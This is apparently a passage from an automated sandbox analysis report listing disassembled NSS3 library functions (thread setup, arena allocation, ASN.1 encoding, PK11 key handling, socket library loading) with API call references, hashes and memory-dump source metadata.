Part of subcall function 6C58BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C58BBFB
Part of subcall function 6C58BB80: GetLastError.KERNEL32 ref: 6C58BC03
Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C58BC19
Part of subcall function 6C58BB80: free.MOZGLUE(00000000), ref: 6C58BC22

PR_NewCondVar.NSS3(?), ref: 6C6B9CF0
PR_NewPollableEvent.NSS3 ref: 6C6B9D03

Part of subcall function 6C6AF3B0: PR_CallOnce.NSS3(6C7014B0,6C6AF510), ref: 6C6AF3E6
Part of subcall function 6C6AF3B0: PR_CreateIOLayerStub.NSS3(6C70006C), ref: 6C6AF402
Part of subcall function 6C6AF3B0: PR_Malloc.NSS3(00000004), ref: 6C6AF416
Part of subcall function 6C6AF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C6AF42D
Part of subcall function 6C6AF3B0: PR_SetSocketOption.NSS3(?), ref: 6C6AF455
Part of subcall function 6C6AF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C6AF473

Part of subcall function 6C669890: TlsGetValue.KERNEL32(?,?,?,6C6697EB), ref: 6C66989E

EnterCriticalSection.KERNEL32(?), ref: 6C6B9D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C6B9DAF
_PR_CreateThread.NSS3(00000000,6C6B9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C6B9D9F

Part of subcall function 6C58B3C0: TlsGetValue.KERNEL32 ref: 6C58B403
Part of subcall function 6C58B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C58B459

_PR_CreateThread.NSS3(00000000,6C6BA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C6B9DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C6B9DFC
_PR_CreateThread.NSS3(00000000,6C6BA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C6B9E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C6B9E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C6B9E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B9E89

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: f614fe683049d851dec13fe8eb8ffca8c78a67e28fae1a55eaadddec62cb06cb
Instruction ID: 84f36f3a32c9966ca3cbd02cc87a377571484d98f73ab0ad3c5b345fe464149f
Opcode Fuzzy Hash: f614fe683049d851dec13fe8eb8ffca8c78a67e28fae1a55eaadddec62cb06cb
Instruction Fuzzy Hash: EF614DB1900706AFD710DF75D844A67BBF8FF49308B04452AE85AD7B51E730E825CBA9

Function 6C5B3FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6C5B4014

Part of subcall function 6C5B39F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C5B5E6F,?), ref: 6C5B3A08
Part of subcall function 6C5B39F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C5B5E6F), ref: 6C5B3A1C
Part of subcall function 6C5B39F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B3A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B4038

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C5B404D

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C6CA0F4), ref: 6C5B40C2

Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5FF0C8
Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5FF122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C5B409A

Part of subcall function 6C5FBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5AE708,00000000,00000000,00000004,00000000), ref: 6C5FBE6A
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?), ref: 6C5FBE7E
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B40DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B40F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B4108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C5B411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C5B4137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C5B4150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C6CA1C8), ref: 6C5B417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C5B4194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5B41A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B41B2
PK11_DestroyObject.NSS3(?,?), ref: 6C5B41D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5B41FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C6CA1A8), ref: 6C5B422D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: 1a90ce871c7a6109a95e4731e4f57b0548c1f21476a08ef67bd95c6d173330b3
Instruction ID: ebcbfd236f26812b4d2b3a180a7dbe7416d17fb627779044a6586413a1b7b636
Opcode Fuzzy Hash: 1a90ce871c7a6109a95e4731e4f57b0548c1f21476a08ef67bd95c6d173330b3
Instruction Fuzzy Hash: 12510AB5F00300ABF7249B259C51B677ADCDF9124CF044918ED6AE6F82FB31D908C666

Function 6C5F8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8E9E
PORT_ArenaAlloc_Util.NSS3(6C700B64,00000001,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C5F8E01), ref: 6C5F8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C700B64,6C700B64), ref: 6C5F8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C5F8F3F

Part of subcall function 6C5FA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C5FA421,00000000,00000000,6C5F9826), ref: 6C5FA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5F904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C5F8E76

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 0f45e86c31b8d3e636051ff1a2b3560a79e00d792097b40ec99e2fb8a20bc049
Instruction ID: 14d8bbddb63b341c66709fb5f76b85827c01dc570b6cd5b4ce18d64d5bd552bc
Opcode Fuzzy Hash: 0f45e86c31b8d3e636051ff1a2b3560a79e00d792097b40ec99e2fb8a20bc049
Instruction Fuzzy Hash: 0C6191B5E001069FDB14CF56CC80AABB7B9EF85358F144528DD29A7700E732A916CFA5

Function 6C5A8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C5A8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5A8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6D18D0,?), ref: 6C5A8F03
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A8F19
PL_FreeArenaPool.NSS3(?), ref: 6C5A8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5A8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5A8F65
PL_FinishArenaPool.NSS3(?), ref: 6C5A8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C5A8FFE
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A9012
PL_FreeArenaPool.NSS3(?), ref: 6C5A9024
PL_FinishArenaPool.NSS3(?), ref: 6C5A902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C5A903E

Strings

security, xrefs: 6C5A8EE7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 8e9cc2bcf41031ebc019629a27df8314121d0be09426188744574dcf1398468c
Instruction ID: cfa52762f4ce349c662f0abf17233bbc9d650ac10e3ffb8c8de6b471a94c318c
Opcode Fuzzy Hash: 8e9cc2bcf41031ebc019629a27df8314121d0be09426188744574dcf1398468c
Instruction Fuzzy Hash: F55149B1608240EBD7149A969C41BAF73E8AF8635CF44082EF95597B40D731D90AC75B

Function 6C66CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C66CC7B), ref: 6C66CD7A

Part of subcall function 6C66CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C5DC1A8,?), ref: 6C66CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C66CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C66CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C66CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C66CD8E

Part of subcall function 6C5905C0: PR_EnterMonitor.NSS3 ref: 6C5905D1
Part of subcall function 6C5905C0: PR_ExitMonitor.NSS3 ref: 6C5905EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C66CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C66CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C66CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C66CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C66CE48

Strings

getaddrinfo, xrefs: 6C66CD88, 6C66CDF9
wship6.dll, xrefs: 6C66CDE3
ws2_32.dll, xrefs: 6C66CD75
freeaddrinfo, xrefs: 6C66CD9F, 6C66CE10
getnameinfo, xrefs: 6C66CDB2, 6C66CE23

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: f1a92cc2ed85dd1bfbb2b526f166a4cf9c9f64a83f3a2b456f54731867912615
Instruction ID: 59833a5ebfbcefb95dc28fd1132b9e10c1bc3da33af6fe27e9681475176f7119
Opcode Fuzzy Hash: f1a92cc2ed85dd1bfbb2b526f166a4cf9c9f64a83f3a2b456f54731867912615
Instruction Fuzzy Hash: FC11A2F5E1396163DB0166766C009AE39E85B8225CB184939D807D2E01FF22E9498BEF

Function 6C6B1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C6B13BC,?,?,?,6C6B1193), ref: 6C6B1C6B
PR_NewLock.NSS3(?,6C6B1193), ref: 6C6B1C7E

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_NewCondVar.NSS3(00000000,?,6C6B1193), ref: 6C6B1C91

Part of subcall function 6C58BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5921BC), ref: 6C58BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C6B1193), ref: 6C6B1CA7

Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C58BBEB
Part of subcall function 6C58BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C58BBFB
Part of subcall function 6C58BB80: GetLastError.KERNEL32 ref: 6C58BC03
Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C58BC19
Part of subcall function 6C58BB80: free.MOZGLUE(00000000), ref: 6C58BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C6B1193), ref: 6C6B1CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C6B1193), ref: 6C6B1CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C6B1193), ref: 6C6B1CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D1A

Part of subcall function 6C669BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C591A48), ref: 6C669BB3
Part of subcall function 6C669BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C591A48), ref: 6C669BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D3D

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C6B1193), ref: 6C6B1D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C6B1193), ref: 6C6B1D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C6B1193), ref: 6C6B1D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C6B1193), ref: 6C6B1D93
PR_DestroyLock.NSS3(00000000,?,?,6C6B1193), ref: 6C6B1D9F
free.MOZGLUE(00000000,?,6C6B1193), ref: 6C6B1DA8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 473a42908e20131b6a369ea4c627d3b2e3d086471242e62c9c30659d3ba1ac09
Instruction ID: 9da3f0454cfda178375c2159c163ccd267f6f2899f73f09db4693f8fc48224c5
Opcode Fuzzy Hash: 473a42908e20131b6a369ea4c627d3b2e3d086471242e62c9c30659d3ba1ac09
Instruction Fuzzy Hash: 4931E9F1E00701ABEB209F25AC41A9776F8EF4174DF044439E84A97B51FB71E818CB9A

Function 6C5C5E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C5ECF
EnterCriticalSection.KERNEL32(?), ref: 6C5C5EE3
PR_Unlock.NSS3(?), ref: 6C5C5F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C5C5FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6C5C61F4
S&^l, xrefs: 6C5C62E3
S&^l, xrefs: 6C5C5E6C, 6C5C627F, 6C5C5F12

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&^l$S&^l
API String ID: 2280678669-3530093371
Opcode ID: cea932549119ecfa9efe5f205fbb22791f2d60b8eaf5a06ddae13c5d1e7ff60f
Instruction ID: 3a7ed4e557d13b3b1a1951a5f2e4018be67c2d5d7641cce8259185e7e4153f1d
Opcode Fuzzy Hash: cea932549119ecfa9efe5f205fbb22791f2d60b8eaf5a06ddae13c5d1e7ff60f
Instruction Fuzzy Hash: 2DF115B4A00215CFDB44CF58C884B96BBF4FF49304F5482AAD9089B746E7B4EA85CF91

Function 6C610C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,al), ref: 6C610C81

Part of subcall function 6C5FBE30: SECOID_FindOID_Util.NSS3(6C5B311B,00000000,?,6C5B311B,?), ref: 6C5FBE44

Part of subcall function 6C5E8500: SECOID_GetAlgorithmTag_Util.NSS3(6C5E95DC,00000000,00000000,00000000,?,6C5E95DC,00000000,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5E8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C610CC4

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C610CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C610D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C610D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C610D7D
free.MOZGLUE(00000000), ref: 6C610DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C610DC1
free.MOZGLUE(00000000), ref: 6C610DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C610E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C610E0F

Part of subcall function 6C5E95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5E95E0
Part of subcall function 6C5E95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5E95F5
Part of subcall function 6C5E95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C5E9609
Part of subcall function 6C5E95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5E961D
Part of subcall function 6C5E95C0: PK11_GetInternalSlot.NSS3 ref: 6C5E970B
Part of subcall function 6C5E95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C5E9756
Part of subcall function 6C5E95C0: PK11_GetIVLength.NSS3(?), ref: 6C5E9767
Part of subcall function 6C5E95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C5E977E
Part of subcall function 6C5E95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5E978E

Strings

-$al, xrefs: 6C610C64
*,al, xrefs: 6C610C69, 6C610DE0, 6C610C80, 6C610C8B, 6C610CAF
*,al, xrefs: 6C610DCC

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,al$*,al$-$al
API String ID: 3136566230-3270327906
Opcode ID: 726f32e5662f7fb20380f2bdbba6dc4993cfe432192d9c0456e712f0674d3b53
Instruction ID: 09e55e3f999a3198077b2942e379939c55e74850449a2c12db6195549ce9a2aa
Opcode Fuzzy Hash: 726f32e5662f7fb20380f2bdbba6dc4993cfe432192d9c0456e712f0674d3b53
Instruction Fuzzy Hash: B541E3B1D00245ABEF009F69DC41BEF7AB4EF45309F104128E91567B41EB35EA24CBEA

Function 6C605CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C605EC0,00000000,?,?), ref: 6C605CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C605CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C605CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C605D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C605EC0,00000000,?,?), ref: 6C605D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C605D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605D51
